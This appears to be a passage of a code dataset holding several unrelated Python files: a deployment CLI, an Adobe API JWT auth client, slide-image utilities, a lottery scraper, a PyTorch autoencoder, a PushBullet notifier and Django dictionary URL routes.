re.sub(r'[_\\s]', '-', prec['name'])).lower()\n count = -1\n base_endpoint = endpoint\n while any(e['id'] == endpoint for e in endpoints):\n endpoint = f'{base_endpoint}{count}'\n count -= 1\n else:\n if not re.match(r'[A-Za-z0-9-]+', endpoint):\n click.ClickException(f'Invalid endpoint: {endpoint}')\n for e in endpoints:\n if e['id'] == endpoint:\n if e['project_id'] == prec['id']:\n if e['deployment_id']:\n click.ClickException(f'Endpoint {endpoint} is already active for this project')\n else:\n break\n elif prec['name']:\n click.ClickException(f'Endpoint {endpoint} is claimed by project {prec[\"owner\"]/prec[\"name\"]}')\n elif e['owner'] != prec['owner']:\n click.ClickException(f'Endpoint {endpoint} is claimed by another user')\n else:\n click.ClickException(f'Endpoint {endpoint} is claimed by another project')\n ident = Identifier.from_record(prec)\n click.echo(f'Starting deployment {endpoint} for {ident}...', nl=False, err=True)\n response = cluster_call('deployment_start', ident, endpoint=endpoint,\n resource_profile=resource_profile, public=public,\n wait=wait or open, format='dataframe')\n if open:\n from .deployment import open as deployment_open\n ctx.invoke(deployment_open, deployment=response['id'], frame=frame)\n click.echo('started.', err=True)\n print_output(response)\n\n\n@deployment.command(short_help='Stop a deployment.')\n@click.argument('deployment')\n@click.option('--yes', is_flag=True, help='Do not ask for confirmation.')\n@login_options()\ndef stop(deployment, yes):\n '''Stop a deployment.\n\n The DEPLOYMENT identifier need not be fully specified, and may even include\n wildcards. But it must match exactly one project.\n '''\n result = single_deployment(deployment)\n ident = Identifier.from_record(result)\n if not yes:\n yes = click.confirm(f'Stop deployment {ident}', err=True)\n if yes:\n click.echo(f'Stopping {ident}...', nl=False, err=True)\n cluster_call('deployment_stop', result.id)\n click.echo('stopped.', err=True)\n\n\n@deployment.command(short_help='Open a deployment in a browser.')\n@click.argument('deployment')\n@click.option('--frame/--no-frame', default=False, help='Include the AE banner.')\n@login_options()\ndef open(deployment, frame):\n '''Opens a deployment in the default browser.\n\n The DEPLOYMENT identifier need not be fully specified, and may even include\n wildcards. But it must match exactly one session.\n\n For deployments, the frameless version of the deployment will be opened by\n default. If you wish to the Anaconda Enterprise banner at the top\n of the window, use the --frame option.\n '''\n result = single_deployment(deployment)\n scheme, _, hostname, _ = result.project_url.split('/', 3)\n if frame:\n url = f'{scheme}//{hostname}/deployments/detail/{result.id}/view'\n else:\n url = result.url\n webbrowser.open(url, 1, True)\n", "sub_path": "ae5_tools/cli/commands/deployment.py", "file_name": "deployment.py", "file_ext": "py", "file_size_in_byte": 8711, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "click.group", "line_number": 11, "usage_type": "call"}, {"api_name": "format.format_options", "line_number": 13, "usage_type": "call"}, {"api_name": "login.login_options", "line_number": 14, "usage_type": "call"}, {"api_name": "login.cluster_call", "line_number": 31, "usage_type": "call"}, {"api_name": "utils.add_param", "line_number": 33, "usage_type": "call"}, {"api_name": "identifier.Identifier.from_string", "line_number": 33, "usage_type": "call"}, {"api_name": "identifier.Identifier", "line_number": 33, "usage_type": "name"}, {"api_name": "format.print_output", "line_number": 34, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 20, "usage_type": "call"}, {"api_name": "format.format_options", "line_number": 21, "usage_type": "call"}, {"api_name": "login.login_options", "line_number": 22, "usage_type": "call"}, {"api_name": "identifier.Identifier.from_string", "line_number": 38, "usage_type": "call"}, {"api_name": "identifier.Identifier", "line_number": 38, "usage_type": "name"}, {"api_name": "login.cluster_call", "line_number": 39, "usage_type": "call"}, {"api_name": "login.cluster_call", "line_number": 47, "usage_type": "call"}, {"api_name": "format.print_output", "line_number": 48, "usage_type": "call"}, {"api_name": "format.format_options", "line_number": 43, "usage_type": "call"}, {"api_name": "login.login_options", "line_number": 44, "usage_type": "call"}, {"api_name": "format.print_output", "line_number": 62, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 52, "usage_type": "call"}, {"api_name": "format.format_options", "line_number": 53, "usage_type": "call"}, {"api_name": "login.login_options", "line_number": 54, "usage_type": "call"}, {"api_name": "click.ClickException", "line_number": 78, "usage_type": "call"}, {"api_name": "login.cluster_call", "line_number": 81, "usage_type": "call"}, {"api_name": "format.print_output", "line_number": 82, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 66, "usage_type": "call"}, {"api_name": "click.option", "line_number": 67, "usage_type": "call"}, {"api_name": "click.option", "line_number": 68, "usage_type": "call"}, {"api_name": "format.format_options", "line_number": 69, "usage_type": "call"}, {"api_name": "login.login_options", "line_number": 70, "usage_type": "call"}, {"api_name": "login.cluster_call", "line_number": 95, "usage_type": "call"}, {"api_name": "format.print_output", "line_number": 96, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 86, "usage_type": "call"}, {"api_name": "format.format_options", "line_number": 87, "usage_type": "call"}, {"api_name": "login.login_options", "line_number": 88, "usage_type": "call"}, {"api_name": "click.ClickException", "line_number": 127, "usage_type": "call"}, {"api_name": "login.cluster_call", "line_number": 128, "usage_type": "call"}, {"api_name": "login.cluster_call", "line_number": 129, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 143, "usage_type": "call"}, {"api_name": "re.match", "line_number": 150, "usage_type": "call"}, {"api_name": "click.ClickException", "line_number": 151, "usage_type": "call"}, {"api_name": "click.ClickException", "line_number": 156, "usage_type": "call"}, {"api_name": "click.ClickException", "line_number": 160, "usage_type": "call"}, {"api_name": "click.ClickException", "line_number": 162, "usage_type": "call"}, {"api_name": "click.ClickException", "line_number": 164, "usage_type": "call"}, {"api_name": "identifier.Identifier.from_record", "line_number": 165, "usage_type": "call"}, {"api_name": "identifier.Identifier", "line_number": 165, "usage_type": "name"}, {"api_name": "click.echo", "line_number": 166, "usage_type": "call"}, {"api_name": "login.cluster_call", "line_number": 167, "usage_type": "call"}, {"api_name": "deployment.open", "line_number": 172, "usage_type": "argument"}, {"api_name": "click.echo", "line_number": 173, "usage_type": "call"}, {"api_name": "format.print_output", "line_number": 174, "usage_type": "call"}, {"api_name": "deployment.command", "line_number": 99, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 100, "usage_type": "call"}, {"api_name": "click.option", "line_number": 101, "usage_type": "call"}, {"api_name": "click.option", "line_number": 102, "usage_type": "call"}, {"api_name": "click.option", "line_number": 103, "usage_type": "call"}, {"api_name": "click.option", "line_number": 104, "usage_type": "call"}, {"api_name": "click.option", "line_number": 105, "usage_type": "call"}, {"api_name": "click.option", "line_number": 106, "usage_type": "call"}, {"api_name": "click.option", "line_number": 107, "usage_type": "call"}, {"api_name": "format.format_options", "line_number": 108, "usage_type": "call"}, {"api_name": "login.login_options", "line_number": 109, "usage_type": "call"}, {"api_name": "click.pass_context", "line_number": 110, "usage_type": "attribute"}, {"api_name": "identifier.Identifier.from_record", "line_number": 188, "usage_type": "call"}, {"api_name": "identifier.Identifier", "line_number": 188, "usage_type": "name"}, {"api_name": "click.confirm", "line_number": 190, "usage_type": "call"}, {"api_name": "click.echo", "line_number": 192, "usage_type": "call"}, {"api_name": "login.cluster_call", "line_number": 193, "usage_type": "call"}, {"api_name": "click.echo", "line_number": 194, "usage_type": "call"}, {"api_name": "deployment.command", "line_number": 177, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 178, "usage_type": "call"}, {"api_name": "click.option", "line_number": 179, "usage_type": "call"}, {"api_name": "login.login_options", "line_number": 180, "usage_type": "call"}, {"api_name": "webbrowser.open", "line_number": 217, "usage_type": "call"}, {"api_name": "deployment.command", "line_number": 197, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 198, "usage_type": "call"}, {"api_name": "click.option", "line_number": 199, "usage_type": "call"}, {"api_name": "login.login_options", "line_number": 200, "usage_type": "call"}]} +{"seq_id": "11917372", "text": "# Copyright (c) 2016-2017 Adobe Inc. All rights reserved.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport datetime as dt\nimport time\n\nimport jwt # package name is PyJWT in setup\nimport requests\nimport urllib.parse as urlparse\n\n\nclass JWT(object):\n def __init__(self, org_id, tech_acct, ims_host, api_key, key_file):\n self.expiry_time = int(time.time()) + 60*60*24\n self.org_id = org_id\n self.tech_acct = tech_acct\n self.ims_host = ims_host\n self.api_key = api_key\n\n self.key = key_file.read()\n key_file.close()\n\n def __call__(self):\n payload = {\n \"exp\": self.expiry_time,\n \"iss\": self.org_id,\n \"sub\": self.tech_acct,\n \"aud\": \"https://\" + self.ims_host + \"/c/\" + self.api_key,\n \"https://\" + self.ims_host + \"/s/\" + \"ent_user_sdk\": True\n }\n\n # create JSON Web Token\n # noinspection PyUnresolvedReferences\n return jwt.encode(payload, self.key, algorithm='RS256')\n\n\nclass AccessRequest(object):\n def __init__(self, endpoint, api_key, client_secret, jwt_token, ssl_verify):\n self.endpoint = endpoint\n self.api_key = api_key\n self.client_secret = client_secret\n self.jwt_token = jwt_token\n self.expiry = None\n self.ssl_verify = ssl_verify\n\n def __call__(self):\n headers = {\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Cache-Control\": \"no-cache\",\n }\n body = urlparse.urlencode({\n \"client_id\": self.api_key,\n \"client_secret\": self.client_secret,\n \"jwt_token\": self.jwt_token\n })\n\n r = requests.post(self.endpoint, headers=headers, data=body, verify=self.ssl_verify)\n if r.status_code != 200:\n raise RuntimeError(\"Unable to authorize against {}:\\n\"\n \"Response Code: {:d}, Response Text: {}\\n\"\n \"Response Headers: {}]\".format(self.endpoint, r.status_code, r.text, r.headers))\n\n self.set_expiry(r.json()['expires_in'])\n\n return r.json()['access_token']\n\n def set_expiry(self, expires_in):\n expires_in = int(round(expires_in/1000))\n self.expiry = dt.datetime.now() + dt.timedelta(seconds=expires_in)\n\n\n# noinspection PyUnresolvedReferences\nclass Auth(requests.auth.AuthBase):\n def __init__(self, api_key, access_token):\n self.api_key = api_key\n self.access_token = access_token\n\n def __call__(self, r):\n r.headers['Content-type'] = 'application/json'\n r.headers['Accept'] = 'application/json'\n r.headers['x-api-key'] = self.api_key\n r.headers['Authorization'] = 'Bearer ' + self.access_token\n return r\n", "sub_path": "umapi_client/auth.py", "file_name": "auth.py", "file_ext": "py", "file_size_in_byte": 3768, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "time.time", "line_number": 31, "usage_type": "call"}, {"api_name": "jwt.encode", "line_number": 51, "usage_type": "call"}, {"api_name": "urllib.parse.urlencode", "line_number": 68, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 68, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 74, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 86, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 86, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 86, "usage_type": "call"}, {"api_name": "requests.auth", "line_number": 90, "usage_type": "attribute"}]} +{"seq_id": "165065889", "text": "import logging\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom tqdm import tqdm\r\nfrom skimage import io\r\n\r\n\r\ndef accuracy(output, target, topk=(1,)):\r\n \"\"\"Computes the precision@k for the specified values of k\"\"\"\r\n maxk = max(topk)\r\n batch_size = target.size(0)\r\n\r\n _, pred = output.topk(maxk, 1, True, True)\r\n pred = pred.t()\r\n correct = pred.eq(target.view(1, -1).expand_as(pred))\r\n\r\n res = []\r\n for k in topk:\r\n correct_k = correct[:k].view(-1).float().sum(0)\r\n res.append(correct_k.mul_(100.0 / batch_size))\r\n return res\r\n\r\n\r\ndef project_results(slides, slides_indices, save_dir, slides_probs=None, color=(255, 255, 255),\r\n on_thumbnail=True, slides_labels=None, postfix='projected'):\r\n patch_size = 512 # the size of patches extracted from 20x svs image\r\n target_mag = 20\r\n slides_info = pd.read_pickle('./data_for_train/slides_size_info.pickle')\r\n for slide_name in tqdm(sorted(slides.Slide_name)):\r\n slide_info = slides_info[slides_info.Slide_name == slide_name]\r\n if slide_name not in slides_indices.keys():\r\n continue\r\n indices = np.array(slides_indices[slide_name])\r\n\r\n mag, h, w = slide_info['Magnification'].values[0], slide_info['Height'].values[0], slide_info['Width'].values[0]\r\n extract_patch_size = int(patch_size * mag / target_mag)\r\n\r\n thumbnail = io.imread('../data/20x/thumbnail/{:s}_thumbnail.png'.format(slide_name))\r\n N_patch_row = h // extract_patch_size\r\n # N_patch_col = w // extract_patch_size\r\n stride = int(float(thumbnail.shape[0]) / N_patch_row)\r\n\r\n if slides_probs is None:\r\n probs = np.ones(indices.shape).astype(np.float)\r\n color_mask = np.zeros(thumbnail.shape, dtype=np.float)\r\n else:\r\n probs = slides_probs[slide_name]\r\n color_mask = np.ones(thumbnail.shape, dtype=np.float)\r\n\r\n for j in range(0, thumbnail.shape[1], stride):\r\n for i in range(0, thumbnail.shape[0], stride):\r\n index = (j//stride) * N_patch_row + (i//stride) + 1\r\n if index in indices:\r\n prob = probs[indices == index]\r\n color_mask[i:i + stride, j:j + stride, :] = np.array(color) / 255 * prob\r\n\r\n if on_thumbnail:\r\n thumbnail = thumbnail.astype(np.float) / 255\r\n result = thumbnail * color_mask\r\n # result = 0.5 * thumbnail + 0.5 * color_mask\r\n else:\r\n result = color_mask\r\n\r\n if slides_labels is not None:\r\n label = int(slides_labels[slide_name])\r\n io.imsave('{:s}/{:s}_{:d}_{:s}.png'.format(save_dir, slide_name, label, postfix), (result*255).astype(np.uint8))\r\n else:\r\n io.imsave('{:s}/{:s}_{:s}.png'.format(save_dir, slide_name, postfix), (result*255).astype(np.uint8))\r\n\r\n\r\ndef show_figures(imgs, new_flag=False):\r\n import matplotlib.pyplot as plt\r\n if new_flag:\r\n for i in range(len(imgs)):\r\n plt.figure()\r\n plt.imshow(imgs[i])\r\n else:\r\n for i in range(len(imgs)):\r\n plt.figure(i+1)\r\n plt.imshow(imgs[i])\r\n\r\n plt.show()\r\n\r\n\r\nclass AverageMeter(object):\r\n \"\"\"Computes and stores the average and current value\"\"\"\r\n def __init__(self):\r\n self.reset()\r\n\r\n def reset(self):\r\n self.val = 0\r\n self.avg = 0\r\n self.sum = 0\r\n self.count = 0\r\n\r\n def update(self, val, n=1):\r\n self.val = val\r\n self.sum += val * n\r\n self.count += n\r\n self.avg = self.sum / self.count\r\n\r\n\r\ndef setup_logger(opt):\r\n mode = 'a' if opt.train['checkpoint'] else 'w'\r\n\r\n # create logger for training information\r\n logger = logging.getLogger('train_logger')\r\n logger.setLevel(logging.DEBUG)\r\n # create console handler and file handler\r\n console_handler = logging.StreamHandler()\r\n console_handler.setLevel(logging.INFO)\r\n file_handler = logging.FileHandler('{:s}/train_log.txt'.format(opt.train['save_dir']), mode=mode)\r\n file_handler.setLevel(logging.DEBUG)\r\n # create formatter\r\n formatter = logging.Formatter('%(asctime)s\\t%(message)s', datefmt='%m-%d %I:%M')\r\n # add formatter to handlers\r\n console_handler.setFormatter(formatter)\r\n file_handler.setFormatter(formatter)\r\n # add handlers to logger\r\n logger.addHandler(console_handler)\r\n logger.addHandler(file_handler)\r\n\r\n # create logger for epoch results\r\n logger_results = logging.getLogger('results')\r\n logger_results.setLevel(logging.DEBUG)\r\n\r\n # set up logger for each result\r\n file_handler2 = logging.FileHandler('{:s}/epoch_results.txt'.format(opt.train['save_dir']), mode=mode)\r\n file_handler2.setFormatter(logging.Formatter('%(message)s'))\r\n logger_results.addHandler(file_handler2)\r\n\r\n logger.info('***** Training starts *****')\r\n logger.info('save directory: {:s}'.format(opt.train['save_dir']))\r\n if mode == 'w':\r\n logger_results.info('epoch Train_loss train_acc || Test_loss test_acc test_auc')\r\n\r\n return logger, logger_results\r\n\r\n\r\ndef get_thumbnails():\r\n import os\r\n from openslide import OpenSlide\r\n\r\n data_dir = '/media/hui/Local Disk1/work/Data/Liver_Multi_Modality/Pathology/SlideImages/20-1018 PURU_VINOD'\r\n save_dir = '/media/hui/Local Disk1/work/Data/Liver_Multi_Modality/Pathology/thumbnails'\r\n os.makedirs(save_dir, exist_ok=True)\r\n filelist = os.listdir(data_dir)\r\n\r\n for file in filelist:\r\n wsi_file = OpenSlide('{:s}/{:s}'.format(data_dir, file))\r\n thumbnail = wsi_file.get_thumbnail((1000, 1000))\r\n thumbnail.save('{:s}/{:s}.png'.format(save_dir, file.split('.')[0]))\r\n", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 5707, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pandas.read_pickle", "line_number": 28, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 33, "usage_type": "call"}, {"api_name": "skimage.io.imread", "line_number": 38, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 38, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 44, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 45, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 48, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 58, "usage_type": "attribute"}, {"api_name": "skimage.io.imsave", "line_number": 66, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 66, "usage_type": "name"}, {"api_name": "numpy.uint8", "line_number": 66, "usage_type": "attribute"}, {"api_name": "skimage.io.imsave", "line_number": 68, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 68, "usage_type": "name"}, {"api_name": "numpy.uint8", "line_number": 68, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 107, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 108, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 110, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 111, "usage_type": "attribute"}, {"api_name": "logging.FileHandler", "line_number": 112, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 113, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 115, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 124, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 125, "usage_type": "attribute"}, {"api_name": "logging.FileHandler", "line_number": 128, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 129, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 146, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 147, "usage_type": "call"}, {"api_name": "openslide.OpenSlide", "line_number": 150, "usage_type": "call"}]} +{"seq_id": "639618816", "text": "#!usr/bin/env python\n#-*- coding:utf-8 -*-\nimport requests\nimport parsel\ndef getdata():\n response = requests.get(\"https://datachart.500.com/ssq/history/newinc/history.php?limit=8000&sort=0\")\n response.encoding = response.apparent_encoding\n # 把所有的html信息交给etree\n sel = parsel.Selector(response.text)\n trs = sel.xpath(\"//tbody[@id='tdata']/tr\")\n for tr in trs:\n datas = tr.xpath('td/text()').getall()\n data = map(lambda x: x.replace(\",\", \"\").replace(\"\\xa0\", \"\"), datas)\n data = ','.join(data)\n print(data)\n break\n\nimport pandas as pd\nimport matplotlib.pyplot as plot\n\ndef data_analysis():\n df = pd.read_csv(\"data.csv\", header=None)\n # 提取红球开奖号码\n red_ball = df.loc[:, 1:6]\n # 红球开奖号码出现的次数\n red_counts = pd.value_counts(red_ball.values.flatten())\n # 篮球\n blue_ball = df.loc[:, [7]]\n blue_counts = pd.value_counts(blue_ball.values.flatten())\n # 可视化\n plot.pie(red_counts, labels=red_counts.index, radius=1, wedgeprops={\"width\": 0.3})\n plot.pie(blue_counts, labels=blue_counts.index, radius=0.5, wedgeprops={\"width\": 0.3})\n plot.show()\n\nif __name__ == '__main__':\n getdata()\n data_analysis()\n", "sub_path": "spider/ArticleSpider/spiderproject/Ticket.py", "file_name": "Ticket.py", "file_ext": "py", "file_size_in_byte": 1240, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 6, "usage_type": "call"}, {"api_name": "parsel.Selector", "line_number": 9, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 22, "usage_type": "call"}, {"api_name": "pandas.value_counts", "line_number": 26, "usage_type": "call"}, {"api_name": "pandas.value_counts", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.pie", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.pie", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}]} +{"seq_id": "513511587", "text": "import torch\nfrom torch.nn.parameter import Parameter\nfrom torch.nn import init\nimport torch.nn.functional as F\nfrom myLayers import FCLayer\nclass AutoEncoder(torch.nn.Module):\n def __init__(self, input_size, hidden_layers):\n super().__init__()\n self.layers = torch.nn.ModuleList()\n features = [input_size] + hidden_layers + [input_size]\n for index in range(len(features) - 1):\n self.layers.append(FCLayer(features[index], features[index + 1]))\n\n def forward(self, input_data):\n output = input_data\n for layer in self.layers:\n output = layer(output)\n return output\nif __name__ == \"__main__\":\n N = 5000\n n = 100000\n train = torch.randint(low=0, high=1000, size=(N, 128), dtype=torch.float)\n test = torch.randint(low=0, high=1000, size=(n, 128), dtype=torch.float)\n myEncoder = AutoEncoder(128, [256, 8, 256])\n criterion = torch.nn.MSELoss()\n optimizer = torch.optim.Adam(myEncoder.parameters(), lr=1e-5)\n for t in range(500):\n for i in range(N):\n # Forward pass: Compute predicted y by passing x to the model\n y_pred = myEncoder(train[i,:])\n # Compute and print loss\n loss = criterion(y_pred, train[i,:])\n if i % 1000 == 0:\n cost = torch.sum(y_pred * train[i,:]) / (torch.sqrt(torch.sum(y_pred ** 2)) * torch.sqrt(torch.sum(train[i,:] ** 2)))\n print(t, loss.item())\n print(t, cost)\n # Zero gradients, perform a backward pass, and update the weights.\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n\n ", "sub_path": "School/Homeworks/Collection of homebrew ML DL algo/AutoEncoder.py", "file_name": "AutoEncoder.py", "file_ext": "py", "file_size_in_byte": 1665, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "torch.nn", "line_number": 6, "usage_type": "attribute"}, {"api_name": "torch.nn.ModuleList", "line_number": 9, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 9, "usage_type": "attribute"}, {"api_name": "myLayers.FCLayer", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.randint", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.randint", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 23, "usage_type": "attribute"}, {"api_name": "torch.nn.MSELoss", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 25, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 26, "usage_type": "attribute"}, {"api_name": "torch.sum", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "133706878", "text": "import requests\nimport json\n\n\"\"\"\nThis class is for the push bullet logic\n\"\"\"\n\n\nclass PushBullet:\n \"\"\"\n This method is to load a PushBullet token\n \"\"\"\n @classmethod\n def load_token(cls, json_file_path):\n with open(json_file_path) as json_file:\n data = json.load(json_file)\n cls.token = data['token']\n\n \"\"\"\n This method sends the notification to PushBullet via their API\n \"\"\"\n @classmethod\n def notify(cls, message):\n data = {\n 'type': 'note',\n 'title': 'Alert',\n 'body': message\n }\n response = requests.post(\n 'https://api.pushbullet.com/v2/pushes',\n data=data,\n auth=(cls.token, '')\n )\n print(\"Sent Notification via PushBullet\")\n", "sub_path": "pushBullet.py", "file_name": "pushBullet.py", "file_ext": "py", "file_size_in_byte": 789, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "json.load", "line_number": 16, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "442900785", "text": "# -*- coding: utf-8 -*-\n\nfrom django.conf.urls.defaults import *\nfrom django.conf import settings\n\nfrom dictionary.models import Term\nfrom dictionary.forms import TermForm\nfrom wiki import views\nfrom dictionary import views as dictviews\n\ntry:\n WIKI_URL_RE = settings.WIKI_URL_RE\nexcept AttributeError:\n WIKI_URL_RE = r'[-\\w]+'\n\nurlpatterns = patterns('',\n url(r'^$', dictviews.home,\n name='dictionary_home'),\n\n url(r'^edit/(?P'+ WIKI_URL_RE +r')/$', views.edit_article,\n {'template_dir': 'dictionary',\n 'ArticleClass': Term,\n 'article_qs': Term.objects.all(),\n 'ArticleFormClass': TermForm},\n name='dictionary_edit'),\n\n url(r'^search/$', dictviews.search,\n name='dictionary_search'),\n\n url(r'^new/$', dictviews.new_article,\n name='dictionary_new'),\n\n url(r'^history/(?P'+ WIKI_URL_RE +r')/$', views.article_history,\n {'template_dir': 'dictionary'},\n name='dictionary_article_history'),\n\n url(r'^history/(?P'+ WIKI_URL_RE +r')/changeset/(?P\\d+)/$', views.view_changeset,\n {'template_dir': 'dictionary'},\n name='dictionary_changeset',),\n\n url(r'^history/(?P'+ WIKI_URL_RE +r')/revert/$', views.revert_to_revision,\n {'template_dir': 'dictionary'},\n name='dictionary_revert_to_revision'),\n \n url(r'^view/(?P'+ WIKI_URL_RE +r')/$', views.view_article,\n {'ArticleClass': Term,\n 'article_qs': Term.objects.all(),\n 'template_dir': 'dictionary'},\n name='dictionary_view'),\n \n url(r'^ajax/(?P'+ WIKI_URL_RE +r')/$', views.view_article,\n {'ArticleClass': Term,\n 'article_qs': Term.objects.all(),\n 'template_dir': 'dictionary',\n 'template_name': 'ajax.html'},\n name='dictionary_ajax'),\n \n url(r'^w/view/(?P'+ WIKI_URL_RE +r')/$', dictviews.view_wiki_article,\n name='wiki_article'),\n url(r'^w/history/(?P'+ WIKI_URL_RE +r')/$', dictviews.article_history,\n name='wiki_article_history'),\n)\n", "sub_path": "myewb/apps/dictionary/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 2076, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.conf.settings.WIKI_URL_RE", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 12, "usage_type": "name"}, {"api_name": "dictionary.views.home", "line_number": 17, "usage_type": "attribute"}, {"api_name": "dictionary.views", "line_number": 17, "usage_type": "name"}, {"api_name": "wiki.views.edit_article", "line_number": 20, "usage_type": "attribute"}, {"api_name": "wiki.views", "line_number": 20, "usage_type": "name"}, {"api_name": "dictionary.models.Term", "line_number": 22, "usage_type": "name"}, {"api_name": "dictionary.models.Term.objects.all", "line_number": 23, "usage_type": "call"}, {"api_name": "dictionary.models.Term.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "dictionary.models.Term", "line_number": 23, "usage_type": "name"}, {"api_name": "dictionary.forms.TermForm", "line_number": 24, "usage_type": "name"}, {"api_name": "dictionary.views.search", "line_number": 27, "usage_type": "attribute"}, {"api_name": "dictionary.views", "line_number": 27, "usage_type": "name"}, {"api_name": "dictionary.views.new_article", "line_number": 30, "usage_type": "attribute"}, {"api_name": "dictionary.views", "line_number": 30, "usage_type": "name"}, {"api_name": "wiki.views.article_history", "line_number": 33, "usage_type": "attribute"}, {"api_name": "wiki.views", "line_number": 33, "usage_type": "name"}, {"api_name": "wiki.views.view_changeset", "line_number": 37, 